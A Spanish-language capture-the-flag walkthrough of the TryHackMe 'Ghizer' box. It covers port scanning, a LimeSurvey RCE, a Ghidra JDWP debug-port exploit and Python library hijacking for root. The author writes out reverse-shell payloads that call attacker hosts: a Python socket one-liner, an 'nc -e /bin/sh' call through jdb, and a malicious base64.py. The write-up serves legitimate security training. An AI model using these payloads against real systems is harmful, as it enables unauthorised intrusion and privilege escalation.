This page looks best with JavaScript enabled

TryHackMe - Ghizer

 ·  ☕ 10 min read  ·  ✍️ sckull
featured image

Ghizer es una maquina de TryHackMe, encontramos un HoneyPot en el puerto FTP. Explotamos un RCE en LimeSurvey lo que nos dio acceso a la maquina. Encontramos JDWP el cual nos conectamos para obtener acceso al siguiente usuario. Tenemos permisos para ejecutar un script con Python3 al cual realizamos Python Library Hijacking para escalar privilegios.

Room

Titulo Ghizer box_img_maker
Descripción lucrecia has installed multiple web applications on the server.
Puntos 220
Dificultad Media
Maker

stuxnet

NMAP

Escaneo de puertos tcp, nmap nos muestra el puerto ftp (21), http (80), ssl/https (443), servicio de java(?) (18002) y algunos otros puertos abiertos que no logramos obtener informacion.

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127

Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-04 18:24 EDT
Nmap scan report for 10.10.26.105 (10.10.26.105)
Host is up (0.31s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE  VERSION
21/tcp  open  ftp?
80/tcp  open  http     Apache httpd 2.4.18 ((Ubuntu))
443/tcp open  ssl/http Apache httpd 2.4.18 ((Ubuntu))
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port21-TCP:V=7.80%I=7%D=9/4%Time=5F52BEA9%P=x86_64-pc-linux-gnu%r(NULL,
SF:33,"220\x20Welcome\x20to\x20Anonymous\x20FTP\x20server\x20\(vsFTPd\x203
SF:\.0\.3\)\n")%r(GenericLines,58,"220\x20Welcome\x20to\x20Anonymous\x20FT
SF:P\x20server\x20\(vsFTPd\x203\.0\.3\)\n530\x20Please\x20login\x20with\x2
SF:0USER\x20and\x20PASS\.\n")%r(Help,58,"220\x20Welcome\x20to\x20Anonymous
SF:\x20FTP\x20server\x20\(vsFTPd\x203\.0\.3\)\n530\x20Please\x20login\x20w
SF:ith\x20USER\x20and\x20PASS\.\n")%r(GetRequest,58,"220\x20Welcome\x20to\
SF:x20Anonymous\x20FTP\x20server\x20\(vsFTPd\x203\.0\.3\)\n530\x20Please\x
SF:20login\x20with\x20USER\x20and\x20PASS\.\n")%r(HTTPOptions,58,"220\x20W
SF:elcome\x20to\x20Anonymous\x20FTP\x20server\x20\(vsFTPd\x203\.0\.3\)\n53
SF:0\x20Please\x20login\x20with\x20USER\x20and\x20PASS\.\n")%r(RTSPRequest
SF:,58,"220\x20Welcome\x20to\x20Anonymous\x20FTP\x20server\x20\(vsFTPd\x20
SF:3\.0\.3\)\n530\x20Please\x20login\x20with\x20USER\x20and\x20PASS\.\n")%
SF:r(RPCCheck,33,"220\x20Welcome\x20to\x20Anonymous\x20FTP\x20server\x20\(
SF:vsFTPd\x203\.0\.3\)\n")%r(DNSVersionBindReqTCP,58,"220\x20Welcome\x20to
SF:\x20Anonymous\x20FTP\x20server\x20\(vsFTPd\x203\.0\.3\)\n530\x20Please\
SF:x20login\x20with\x20USER\x20and\x20PASS\.\n")%r(DNSStatusRequestTCP,58,
SF:"220\x20Welcome\x20to\x20Anonymous\x20FTP\x20server\x20\(vsFTPd\x203\.0
SF:\.3\)\n530\x20Please\x20login\x20with\x20USER\x20and\x20PASS\.\n")%r(SS
SF:LSessionReq,33,"220\x20Welcome\x20to\x20Anonymous\x20FTP\x20server\x20\
SF:(vsFTPd\x203\.0\.3\)\n")%r(TerminalServerCookie,33,"220\x20Welcome\x20t
SF:o\x20Anonymous\x20FTP\x20server\x20\(vsFTPd\x203\.0\.3\)\n")%r(TLSSessi
SF:onReq,33,"220\x20Welcome\x20to\x20Anonymous\x20FTP\x20server\x20\(vsFTP
SF:d\x203\.0\.3\)\n")%r(Kerberos,33,"220\x20Welcome\x20to\x20Anonymous\x20
SF:FTP\x20server\x20\(vsFTPd\x203\.0\.3\)\n")%r(SMBProgNeg,33,"220\x20Welc
SF:ome\x20to\x20Anonymous\x20FTP\x20server\x20\(vsFTPd\x203\.0\.3\)\n")%r(
SF:X11Probe,58,"220\x20Welcome\x20to\x20Anonymous\x20FTP\x20server\x20\(vs
SF:FTPd\x203\.0\.3\)\n530\x20Please\x20login\x20with\x20USER\x20and\x20PAS
SF:S\.\n")%r(FourOhFourRequest,58,"220\x20Welcome\x20to\x20Anonymous\x20FT
SF:P\x20server\x20\(vsFTPd\x203\.0\.3\)\n530\x20Please\x20login\x20with\x2
SF:0USER\x20and\x20PASS\.\n");

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 202.88 seconds

Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-04 18:25 EDT
Warning: 10.10.26.105 giving up on port because retransmission cap hit (2).
Nmap scan report for ghizer.thm (10.10.26.105)
Host is up (0.25s latency).
Not shown: 64833 closed ports, 696 filtered ports
PORT      STATE SERVICE
21/tcp    open  ftp
80/tcp    open  http
443/tcp   open  https
18002/tcp open  unknown
36625/tcp open  unknown
45775/tcp open  unknown

Nmap scan report for ghizer.thm (10.10.26.105)
Host is up (0.25s latency).

PORT      STATE  SERVICE  VERSION
21/tcp    open   ftp?
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, RTSPRequest, X11Probe: 
|     220 Welcome to Anonymous FTP server (vsFTPd 3.0.3)
|     Please login with USER and PASS.
|   Kerberos, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServerCookie: 
|_    220 Welcome to Anonymous FTP server (vsFTPd 3.0.3)
80/tcp    open   http     Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: LimeSurvey http://www.limesurvey.org
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title:         LimeSurvey    
443/tcp   open   ssl/ssl  Apache httpd (SSL-only mode)
|_http-generator: WordPress 5.4.2
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Ghizer – Just another WordPress site
| ssl-cert: Subject: commonName=ubuntu
| Not valid before: 2020-07-23T17:27:31
|_Not valid after:  2030-07-21T17:27:31
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
18002/tcp open   java-rmi Java RMI
| rmi-dumpregistry: 
|   jmxrmi
|     javax.management.remote.rmi.RMIServerImpl_Stub
|     @127.0.1.1:33943
|     extends
|       java.rmi.server.RemoteStub
|       extends
|_        java.rmi.server.RemoteObject
36625/tcp closed unknown
45775/tcp closed unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port21-TCP:V=7.80%I=7%D=8/14%Time=5F365C14%P=x86_64-pc-linux-gnu%r(NULL
SF:,33,"220\x20Welcome\x20to\x20Anonymous\x20FTP\x20server\x20\(vsFTPd\x20
SF:3\.0\.3\)\n")%r(GenericLines,58,"220\x20Welcome\x20to\x20Anonymous\x20F
SF:TP\x20server\x20\(vsFTPd\x203\.0\.3\)\n530\x20Please\x20login\x20with\x
SF:20USER\x20and\x20PASS\.\n")%r(Help,58,"220\x20Welcome\x20to\x20Anonymou
SF:s\x20FTP\x20server\x20\(vsFTPd\x203\.0\.3\)\n530\x20Please\x20login\x20
SF:with\x20USER\x20and\x20PASS\.\n")%r(GetRequest,58,"220\x20Welcome\x20to
SF:\x20Anonymous\x20FTP\x20server\x20\(vsFTPd\x203\.0\.3\)\n530\x20Please\
SF:x20login\x20with\x20USER\x20and\x20PASS\.\n")%r(HTTPOptions,58,"220\x20
SF:Welcome\x20to\x20Anonymous\x20FTP\x20server\x20\(vsFTPd\x203\.0\.3\)\n5
SF:30\x20Please\x20login\x20with\x20USER\x20and\x20PASS\.\n")%r(RTSPReques
SF:t,58,"220\x20Welcome\x20to\x20Anonymous\x20FTP\x20server\x20\(vsFTPd\x2
SF:03\.0\.3\)\n530\x20Please\x20login\x20with\x20USER\x20and\x20PASS\.\n")
SF:%r(RPCCheck,33,"220\x20Welcome\x20to\x20Anonymous\x20FTP\x20server\x20\
SF:(vsFTPd\x203\.0\.3\)\n")%r(DNSVersionBindReqTCP,58,"220\x20Welcome\x20t
SF:o\x20Anonymous\x20FTP\x20server\x20\(vsFTPd\x203\.0\.3\)\n530\x20Please
SF:\x20login\x20with\x20USER\x20and\x20PASS\.\n")%r(DNSStatusRequestTCP,58
SF:,"220\x20Welcome\x20to\x20Anonymous\x20FTP\x20server\x20\(vsFTPd\x203\.
SF:0\.3\)\n530\x20Please\x20login\x20with\x20USER\x20and\x20PASS\.\n")%r(S
SF:SLSessionReq,33,"220\x20Welcome\x20to\x20Anonymous\x20FTP\x20server\x20
SF:\(vsFTPd\x203\.0\.3\)\n")%r(TerminalServerCookie,33,"220\x20Welcome\x20
SF:to\x20Anonymous\x20FTP\x20server\x20\(vsFTPd\x203\.0\.3\)\n")%r(TLSSess
SF:ionReq,33,"220\x20Welcome\x20to\x20Anonymous\x20FTP\x20server\x20\(vsFT
SF:Pd\x203\.0\.3\)\n")%r(Kerberos,33,"220\x20Welcome\x20to\x20Anonymous\x2
SF:0FTP\x20server\x20\(vsFTPd\x203\.0\.3\)\n")%r(SMBProgNeg,33,"220\x20Wel
SF:come\x20to\x20Anonymous\x20FTP\x20server\x20\(vsFTPd\x203\.0\.3\)\n")%r
SF:(X11Probe,58,"220\x20Welcome\x20to\x20Anonymous\x20FTP\x20server\x20\(v
SF:sFTPd\x203\.0\.3\)\n530\x20Please\x20login\x20with\x20USER\x20and\x20PA
SF:SS\.\n")%r(FourOhFourRequest,58,"220\x20Welcome\x20to\x20Anonymous\x20F
SF:TP\x20server\x20\(vsFTPd\x203\.0\.3\)\n530\x20Please\x20login\x20with\x
SF:20USER\x20and\x20PASS\.\n");

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

FTP

Ingresamos por el servicio FTP con las credenciales de anonymous (anonymous:anonymous) en el cual encontramos varios archivos entre ellos las flag root.txt y user.txt, al intentar obtener uno de estos archivos muestra un mensaje de permiso denegado por lo que no logramos hacer nada en este servicio, además es muy raro porque comunmente es posible realizar ls -lah para observar los archivos ocultos, algo que no se pudo lograr en este servicio.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34

kali@kali:~/thm/ghizer$ ftp ghizer.thm 
Connected to ghizer.thm.
220 Welcome to Anonymous FTP server (vsFTPd 3.0.3)
Name (ghizer.thm:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-r-x------    1 0        0            1351  Feb 7   2019 client.py
-r-x------    1 0        0            54324 Feb 7   2019 test.c
-r-x------    1 0        0            1024  Nov 28  2019 prototype.c
-rwx------    1 0        0            4096  Jan 4   2019 root.txt
-r-x------    1 0        0            45550 Dec 12  2019 user.txt
-r-x------    1 0        0            45550 Dec 12  2019 i_honeypot.py
226 Directory send OK.
ftp> get user.txt
local: user.txt remote: user.txt
Permission denied.
200 PORT command successful. Consider using PASV.
550 Permission denied.
ftp> pwd
257 "/home/lucrecia/ftp/" is the current directory
ftp> get root.txt
local: root.txt remote: root.txt
Permission denied.
200 PORT command successful. Consider using PASV.
550 Permission denied.
ftp> bye
221 Goodbye.
kali@kali:~/thm/ghizer$

HTTP

Encontramos una pagina web en el puerto 80, al parecer es una aplicacion web para realizar encuestas.
image

GOBUSTER

Utilizamos gobuster para busqueda de directorios y archivos.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16

kali@kali:~/thm/ghizer$ gobuster dir -u http://ghizer.thm/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -q -t 50 -x php,html,txt
/index.php (Status: 200)
/docs (Status: 301)
/themes (Status: 301)
/admin (Status: 301)
/assets (Status: 301)
/upload (Status: 301)
/tests (Status: 301)
/plugins (Status: 301)
/application (Status: 301)
/tmp (Status: 301)
/framework (Status: 301)
/locale (Status: 301)
/installer (Status: 301)
/third_party (Status: 301)
/server-status (Status: 403)

LimeSurvey - RCE

Encontramos un exploit que afecta a esta aplicacion la cual necesita unas credenciales para subir una shell y ejecutar comandos, utilizamos las credenciales por defecto y ejecutamos el exploit con los parametros necesarios. Vemos que el usuario que esta ejecutando la aplicacion es www-data.
image

Actualizamos a una nueva shell en donde podamos realizar una enumeracion más comoda ejecutando una shell inversa de python.

1

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.2.29.162",1338));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

GHIDRA RCE -> VERONICA

Realizamos una enumeracion en la maquina y vemos que en el directorio principal de la usuario veronica esta Ghidra, además de ello vemos los puertos abiertos en la maquina (ojo con 18001).
image
image

Exploramos las vulnerabilidades en ghidra y al principio vimos el exploit Ghidra (Linux) 9.0.4 - .gar Arbitrary Code Execution que necesita un archivo de project.gar el cual se puede crear en Ghidra a partir de un proyecto, pero este exploit necesita una interaccion con la interfaz visual de Ghidra. Tambien encontramos la vulnerabilidad Remote Code Execution Through JDWP Debug Port el cual afecta a la version 9.0.4. En esta vulnerabilidad Ghidra abre en modo debug JDWP lo cual permite conectarse al puerto 18001 de localhost.

image

Tenemos acceso al puerto (18001) localmente con la shell actual por lo que realizamos la explotacion como en la demostracion de la exploitacion, a continuacion los comandos.

1
2
3
4
5
6
7

#Conexion a jdwp
jdb -attach localhost:18001
#Listar las clases disponibles
#classpath
stop in org.apache.logging.log4j.core.util.WatchManager$WatchRunnable.run()
#Ejecucion de la shell inversa
print new java.lang.Runtime().exec("nc 10.10.10.10 1337 -e /bin/sh")

image

Logramos obtener nuestra flag user.txt y una shell con la usuario Veronica.
image

PRIVILEGE ESCALATION

Hacemos una pequeña enumeracion en la carpeta principal de veronica y vemos un script en python el cual codifica el mensaje tryhackme is the best y además la variable podria darnos una pista de lo que debemos de hacer.

1
2
3
4

import base64

hijackme = base64.b64encode(b'tryhackme is the best')
print(hijackme)

Además vemos un cron que ejecuta el usuario root.
image

Tambien al realizar sudo -l -l vemos que podemos ejecutar /usr/bin/python3.5 /home/veronica/base.py con sudo.
image

Creamos el archivo base64.py en donde colocamos una shell inversa para realizar Python Library Hijacking.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27

import os
import pty
import socket

lhost = "10.10.10.10"
lport = 1337

ZIP_DEFLATED = 0

class ZipFile:
    def close(*args):
        return

    def write(*args):
        return

    def __init__(self, *args):
        return

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((lhost, lport))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
os.putenv("HISTFILE",'/dev/null')
pty.spawn("/bin/bash")
s.close()

Ejecutamos el script con python3 y sudo, ponemos a la escucha netcat en nuestra maquina y logramos obtener una shell con usuario root y nuestra flag root.txt.
image

ANEXO

HONEYPOT - FTP

Al parecer el servicio FTP expuesto en la maquina es un honeypot llamado Lucrecia.
image

Además el cron que encontramos era para ejecutar el honeypot.

1
2
3
4
5

root@ubuntu:/root/Lucrecia# cat lucre.sh
cat lucre.sh
ufw disable
sleep 3
python3 lucrecia.py -f server.conf

TASK 1

Al obtener una shell es posible obtener las credenciales en …

limesurvey/application/config

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69

veronica@ubuntu:/var/www/html/limesurvey/application/config$ cat config.php
cat config.php
<?php if (!defined('BASEPATH')) exit('No direct script access allowed');
/*
| -------------------------------------------------------------------
| DATABASE CONNECTIVITY SETTINGS
| -------------------------------------------------------------------
| This file will contain the settings needed to access your database.
|
| For complete instructions please consult the 'Database Connection'
| page of the User Guide.
|
| -------------------------------------------------------------------
| EXPLANATION OF VARIABLES
| -------------------------------------------------------------------
|
|    'connectionString' Hostname, database, port and database type for 
|     the connection. Driver example: mysql. Currently supported:
|                 mysql, pgsql, mssql, sqlite, oci
|    'username' The username used to connect to the database
|    'password' The password used to connect to the database
|    'tablePrefix' You can add an optional prefix, which will be added
|                 to the table name when using the Active Record class
|
*/
return array(
	'components' => array( 
		'db' => array(
			'connectionString' => 'mysql:host=localhost;port=3306;dbname=limedb;',
			'emulatePrepare' => true,
			'username' => '[... REDACTED ...]',
			'password' => '[... REDACTED ...]',
			'charset' => 'utf8mb4',
			'tablePrefix' => 'lime_',
		),
		
		// Uncomment the following lines if you need table-based sessions.
		// Note: Table-based sessions are currently not supported on MSSQL server.
		// 'session' => array (
			// 'class' => 'application.core.web.DbHttpSession',
			// 'connectionID' => 'db',
			// 'sessionTableName' => '{{sessions}}',
		// ),
		
		'urlManager' => array(
			'urlFormat' => 'path',
			'rules' => array(
				// You can add your own rules here
			),
			'showScriptName' => true,
		),
	
	),
	// For security issue : it's better to set runtimePath out of web access
	// Directory must be readable and writable by the webuser
	// 'runtimePath'=>'/var/limesurvey/runtime/'
	// Use the following config variable to set modified optional settings copied from config-defaults.php
	'config'=>array(
	// debug: Set this to 1 if you are looking for errors. If you still get no errors after enabling this
	// then please check your error-logs - either in your hosting provider admin panel or in some /logs directory
	// on your webspace.
	// LimeSurvey developers: Set this to 2 to additionally display STRICT PHP error messages and get full access to standard templates
		'debug'=>0,
		'debugsql'=>0, // Set this to 1 to enanble sql logging, only active when debug = 2
		// Update default LimeSurvey config here
	)
);
/* End of file config.php */
/* Location: ./application/config/config.php */

TASK 2

En el puerto 443 o https encontramos un mensaje en el index, donde indica que la pagina del login de wordpress ha sido escondida con el plugin WPS Hide Login

… es posible encontrar la pagina de login en el footer.
image
Share on
sckull
WRITTEN BY
sckull
Pentester wannabe

Read other posts

THM: Ghizer